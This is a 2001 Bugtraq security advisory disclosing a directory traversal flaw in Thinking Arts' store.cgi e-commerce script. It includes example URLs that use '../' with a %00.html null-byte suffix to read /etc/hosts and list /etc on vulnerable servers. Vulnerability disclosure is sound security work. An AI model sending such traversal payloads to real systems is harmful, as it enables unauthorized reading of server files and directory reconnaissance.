[19259] in bugtraq
Thinking Arts Store.cgi Directory Traversal
daemon@ATHENA.MIT.EDU (slipy@B10Z.NET)
Fri Feb 16 13:08:53 2001
Message-Id: <20010216071401.16151.qmail@securityfocus.com>
Date: Fri, 16 Feb 2001 07:14:01 -0000
Reply-To: slipy@B10Z.NET
From: slipy@B10Z.NET
To: BUGTRAQ@SECURITYFOCUS.COM
Introduction:
Thinking Arts LTD E-Commerce package comes
with a webstore frontend called store.cgi which
allows people to basically order products on their
website over a SQL database.
The vendors website is:
http://www.thinkingarts.com/
Problem: Simple Directory Traversal
Adding the string "/../" to an URL allows an attacker to
view any file on the server, and also list directories
within the server which the owner of the vulnerable
httpd has permissions to access. Remote execution
of commands does not apear to be possible with this
directory traversal bug, but directory listings are.
Please note that you do need the %00.html at the end
of your command.
Examples:
http://www.VULNERABLE.com/cgi-bin/store.cgi?
StartID=../etc/hosts%00.html
^^ = Will obviously open the hosts file.
http://www.VULNERABLE.com/cgi-bin/store.cgi?
StartID=../etc/%00.html
^^ = Will obviously list the /etc/ directory.
Solution:
Vendor has been contacted. No reply from them yet,
and seeing only 3 sites who signed up for their dumb
service are affected, so it doesn't really matter now
does it?
--------------------
b10z cgi advisory.
slipy@b10z.net
February 16th, 2001.
